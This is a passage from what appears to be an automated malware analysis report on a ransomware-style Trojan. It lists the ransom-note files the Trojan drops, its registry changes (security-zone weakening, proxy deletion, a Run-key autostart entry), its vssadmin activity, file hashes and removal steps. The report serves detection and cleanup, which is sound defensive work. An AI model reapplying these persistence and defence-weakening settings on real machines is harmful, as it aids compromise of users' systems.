%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt (1116 bytes)
%Documents and Settings%\Default User\Templates\excel.xls (427 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\restore_files_fyiyk.html (5 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ip[1].htm (0 bytes)
Registry activity
The process bhtydrhbtr.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D C9 43 F6 6E 3E 8D D3 88 A3 45 55 A6 F7 81 69"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM]
"dl7SNqcf2wq431y4663"
The process %original file name%.exe:396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1440840138"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 FC 4B E5 5C 79 D5 8D CE 16 5A B9 8A 79 6F 3D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process vssadmin.exe:1244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 2D E7 3A C0 E9 08 A4 24 3B 49 3D 50 4A BA A0"
The process vcwuwa.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"VSSADMIN.EXE" = "Command Line Interface for Microsoft® Volume Shadow Copy Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\4417BF4A15FC3273]
"data" = "31 38 38 45 50 70 77 46 6B 64 51 76 43 64 67 78"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 65 6B B3 F1 EC D2 6E 3F 89 DD 30 A3 4D E1 1B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
[HKCU\Software\msys]
"ID" = "44 17 BF 4A 15 FC 32 73"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLinkedConnections" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ms-helper" = "%Documents and Settings%\%current user%\Application Data\vcwuwa.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ms-helper" = "C"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM]
"dl7SNqcf2wq431y4663"
The process bryehretgw.exe:1160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process bryehretgw.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 05 6A 2B 9A 59 BC BC 92 FF 2A 8E 13 75 10 BE"
Dropped PE files
MD5 | File path |
---|---|
057b640c7a79a7b5d41d81f5a40595ff | c:\Documents and Settings\"%CurrentUserName%"\Application Data\vcwuwa.exe |
914e07e0ff8cd513d04a046f9a095682 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bryehretgw.exe |
914e07e0ff8cd513d04a046f9a095682 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].htm |
057b640c7a79a7b5d41d81f5a40595ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].htm |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
bhtydrhbtr.exe:1252
%original file name%.exe:396
vssadmin.exe:1244
bryehretgw.exe:1160
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\AU\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\GHISLER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (1225 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
C:\totalcmd\KEYBOARD.TXT (436 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Templates\excel4.xls (419 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Recent\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\SendTo\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\VMware\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\PrintHood\restore_files_fyiyk.html (5 bytes)
C:\RECYCLER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\My Playlists\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\NetHood\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\UserData\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\My Documents\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.html (5 bytes)
C:\System Volume Information\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\powerpnt.ppt (454 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Music\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.html (5 bytes)
